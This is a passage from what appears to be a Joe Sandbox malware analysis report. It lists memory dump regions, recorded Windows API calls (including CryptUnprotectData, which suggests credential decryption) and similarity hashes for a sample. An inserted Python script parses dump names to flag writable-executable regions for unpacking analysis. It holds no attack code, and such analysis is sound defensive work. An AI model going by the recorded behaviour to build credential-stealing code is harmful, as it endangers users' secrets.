                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID:
                                    • API String ID: 4291131564-0
                                    • Opcode ID: 082f03ce12943ac8a27908729e917edd2c5436c61ebb9641549c4252490d51d0
                                    • Instruction ID: 48310c992ae9276963176309a03e5cc098c4b24c2489945679d0bb9c08d2805e
                                    • Opcode Fuzzy Hash: 082f03ce12943ac8a27908729e917edd2c5436c61ebb9641549c4252490d51d0
                                    • Instruction Fuzzy Hash: 0811A4B4240308EFEB11CF65CC95FAA77B5EB89B10F208499FD159B390C7B2A941CB50
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,018BDDD0,00000000,?,00BF0DF8,00000000,?,00000000,00000000), ref: 00BE7BF3
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BE7BFA
                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,018BDDD0,00000000,?,00BF0DF8,00000000,?,00000000,00000000,?), ref: 00BE7C0D
                                    • wsprintfA.USER32 ref: 00BE7C47
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID:
                                    • API String ID: 3317088062-0
                                    • Opcode ID: ac16d846dc77b839177fd4adf574d5388aa9bc585d8c74a58ceb3fa2f474787a
                                    • Instruction ID: 147d33aad3f1c00dac137023fbe4345cec12f143fb813b09163b1f275595eea7
                                    • Opcode Fuzzy Hash: ac16d846dc77b839177fd4adf574d5388aa9bc585d8c74a58ceb3fa2f474787a
                                    • Instruction Fuzzy Hash: 3C11CEB1A49218EFEB20CB55DC49FA9BBB8FB45710F1003D5F609A32E0DB742A448B50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ATg$r6?s$^^z
                                    • API String ID: 0-2191292061
                                    • Opcode ID: 074d1cc189fa8bd87100809ddf2573494432ebd9daa9960c151ae48ab638199f
                                    • Instruction ID: a999ea69655503d96851f3fd37a51a05613d5aa1524352a90475558543d7f11a
                                    • Opcode Fuzzy Hash: 074d1cc189fa8bd87100809ddf2573494432ebd9daa9960c151ae48ab638199f
                                    • Instruction Fuzzy Hash: 6EB216F3A082009FE304AE2DDC8567ABBE5EF94720F1A893DEAC5C7744E63558458793
                                    APIs
                                    • CoCreateInstance.COMBASE(00BEE120,00000000,00000001,00BEE110,00000000), ref: 00BE39A8
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00BE3A00
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWide
                                    • String ID:
                                    • API String ID: 123533781-0
                                    • Opcode ID: b80ac3ae7c1699f1ad83f6a42e962e12f69efbfacd228f3e60aa0955bcb6ad75
                                    • Instruction ID: f9b0281809f18dcf017ca92cd475afa1642bbe427d6b5d2df0e3fbdfad26a03f
                                    • Opcode Fuzzy Hash: b80ac3ae7c1699f1ad83f6a42e962e12f69efbfacd228f3e60aa0955bcb6ad75
                                    • Instruction Fuzzy Hash: 9041F770A00A289FDB24DB59CC95F9BB7B5BB48702F4051D8E618E7290D7B1AEC5CF50
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00BDA2D4
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00BDA2F3
                                    • LocalFree.KERNEL32(?), ref: 00BDA323
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                    • String ID:
                                    • API String ID: 2068576380-0
                                    • Opcode ID: 7eef976df858dfedacd015d5d9933c7fdad160356581378ddc92f736401bbc3a
                                    • Instruction ID: a649ab7d31846eb7420eac35cf1322d7f4c71cd35a9d8644c057a7d5a43a7558
                                    • Opcode Fuzzy Hash: 7eef976df858dfedacd015d5d9933c7fdad160356581378ddc92f736401bbc3a
                                    • Instruction Fuzzy Hash: 1911E5B8A00209EFCB04DFA5D884AAEB7B5FB89300F104599ED15A7350E770AE54CBA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: '^_l$8A]}
                                    • API String ID: 0-3149520042
                                    • Opcode ID: 688c3b043ac0a9b41735cb41af4e5e463b53807ae52869195c1eb30695b85225
                                    • Instruction ID: f6575643eba68c86561fb173d11ec862898a491fb5c223d877057d59cda4fc51
                                    • Opcode Fuzzy Hash: 688c3b043ac0a9b41735cb41af4e5e463b53807ae52869195c1eb30695b85225
                                    • Instruction Fuzzy Hash: 74B23AF360C204AFE704AE2DEC8577AB7E9EF94760F1A463DE6C4C3744E93598018696
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Fz{$zG
                                    • API String ID: 0-2714076705
                                    • Opcode ID: dc10192a396c28943da4c1e03045d71f4d351dbbd2c901b9271b400c4d940de7
                                    • Instruction ID: 858c6265d5e6c3be0fc403d1af0b20a1444caca65f6253effbaecd4e848f6da9
                                    • Opcode Fuzzy Hash: dc10192a396c28943da4c1e03045d71f4d351dbbd2c901b9271b400c4d940de7
                                    • Instruction Fuzzy Hash: FC82D5F390C204AFE3046E2DEC8567AFBE9EF94720F16492DEAC4C3744E63599448696
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: f0:~$qD6x
                                    • API String ID: 0-907356682
                                    • Opcode ID: 051ed0f1c86ba35ca222fd93ef8c1f5aaba18e108f751d36a7b98b47bd4ed70a
                                    • Instruction ID: 35061654d7c5aca290a9cb280e58453c8d943a5b8963f919e3f1603ebbac3935
                                    • Opcode Fuzzy Hash: 051ed0f1c86ba35ca222fd93ef8c1f5aaba18e108f751d36a7b98b47bd4ed70a
                                    • Instruction Fuzzy Hash: 5A62E5F360C600AFE304AE2DEC95B6AF7EAEBD4320F1A453DE6C4C7744EA3558058656
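                                     Each "Memory Dump Source" block above names the dump a function was found in and the dumps it is associated with, using a long dot-separated identifier. The part of that identifier a practitioner reads first is the region start address and the Windows page protection (00000004 = PAGE_READWRITE, 00000040 = PAGE_EXECUTE_READWRITE, 00000080 = PAGE_EXECUTE_WRITECOPY): a module whose header page is RW but whose code pages are RWX is what you expect from a sample that unpacks or rewrites itself in place. The script below is an added example for reading those blocks; it is not part of this report and not Joe Sandbox code. The field layout of an .sdmp name is an assumption inferred from the names listed here (field 4 read as the region start address, field 5 as its page protection; the remaining fields are not interpreted), "Offset" on the Source File line is read as the image base the dump was rebased on (also an assumption), and the PAGE_* values are the documented winnt.h constants. The sample input is the Source File and Associated lines of the entry above, copied from the report.

```python
import re
from dataclasses import dataclass

# Documented Windows page-protection constants (winnt.h).
PROTECTION_NAMES = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MODIFIER_NAMES = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}

# ASSUMED layout of an .sdmp name, inferred from the names listed in the report
# (not from vendor documentation): field 4 is read as the region start address,
# field 5 as that region's page protection; the other fields are not interpreted.
SDMP_RE = re.compile(
    r"[0-9A-Fa-f]{8}\.[0-9A-Fa-f]{8}\.\d+\."
    r"(?P<address>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})"
    r"(?:\.[0-9A-Fa-f]{8})*\.sdmp"
)
SOURCE_RE = re.compile(r"Source File:\s*(?P<name>\S+?\.sdmp),\s*Offset:\s*(?P<base>[0-9A-Fa-f]+)")
ASSOC_RE = re.compile(r"Associated:\s*(?P<name>\S+?\.sdmp)")


@dataclass(frozen=True)
class Region:
    name: str
    address: int
    protect: int

    @property
    def protection(self) -> str:
        """Symbolic name, e.g. PAGE_EXECUTE_READWRITE|PAGE_GUARD for 0x140."""
        base = PROTECTION_NAMES.get(self.protect & 0xFF, f"0x{self.protect & 0xFF:02X}")
        mods = [n for bit, n in MODIFIER_NAMES.items() if self.protect & bit]
        return "|".join([base, *mods])

    @property
    def executable(self) -> bool:
        return bool(self.protect & 0xF0)  # every PAGE_EXECUTE* value sits in the high nibble

    @property
    def writable_executable(self) -> bool:
        return (self.protect & 0xFF) in (0x40, 0x80)  # RWX, or copy-on-write RWX


def parse_sdmp(name: str) -> Region:
    m = SDMP_RE.fullmatch(name)
    if m is None:
        raise ValueError(f"unrecognised sdmp name: {name}")
    return Region(name, int(m["address"], 16), int(m["protect"], 16))


def parse_card(card: str) -> dict:
    """One entry's 'Memory Dump Source' block -> image base, source region, all regions."""
    src = SOURCE_RE.search(card)
    if src is None:
        raise ValueError("no 'Source File' line in card")
    source = parse_sdmp(src["name"])
    regions = {source.address: source}
    for m in ASSOC_RE.finditer(card):
        r = parse_sdmp(m["name"])
        regions[r.address] = r  # de-duplicate on start address
    return {
        "image_base": int(src["base"], 16),  # 'Offset' read as the rebased PE image base (assumption)
        "source": source,
        "regions": [regions[a] for a in sorted(regions)],
    }


def region_table(card: str) -> list:
    """Regions sorted by address, with RVA from the image base and an R/W/X flag."""
    info = parse_card(card)
    base = info["image_base"]
    rows = []
    for r in info["regions"]:
        flag = "RWX" if r.writable_executable else ("X" if r.executable else "RW")
        mark = "  <- dump holding this function" if r.address == info["source"].address else ""
        rows.append(f"{r.address:08X} +{r.address - base:07X} {r.protection:<24}{flag}{mark}")
    return rows


def writable_executable_regions(card: str) -> list:
    """Start addresses mapped writable+executable: where in-place unpacking or self-modifying code lands."""
    return [r.address for r in parse_card(card)["regions"] if r.writable_executable]


# Sample input: the Source File / Associated lines of one entry above, copied from the report.
SAMPLE_CARD = """\
• Source File: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
• Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
"""

if __name__ == "__main__":
    print("\n".join(region_table(SAMPLE_CARD)))
```

                                     Run against the entry above, the table shows the page at the image base 00BD0000 mapped PAGE_READWRITE and every other dumped region of the module mapped PAGE_EXECUTE_READWRITE or PAGE_EXECUTE_WRITECOPY, with the function in question sitting at RVA +02EA000 inside an RWX region; those are the regions worth carving and re-scanning once the sample has finished unpacking, and the same parser can be pointed at every entry in this section to see which dumps the similarity hits cluster in.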
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ?$__ZN
                                    • API String ID: 0-1427190319
                                    • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                    • Instruction ID: 02adca0b6ce956bdc87ef6214172bf4dfc1448d4843bf1b829f021007c9f4acb
                                    • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                    • Instruction Fuzzy Hash: 137213B2908B109FD718CF24C89076EBBE2BFD5310F698A1DF8A55B292D370DD459B81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: xn--
                                    • API String ID: 0-2826155999
                                    • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                    • Instruction ID: 3ba8d50a9c3ca9da1d677b6f7cd9a7843c0a96637918ed04c64eca23b949f241
                                    • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                    • Instruction Fuzzy Hash: 4AA215B1C042788AEF19CB68E8903FDB7B1FF45300F1842AAD4667BA81D7755E85DB60
                                    APIs
                                    Memory Dump Source
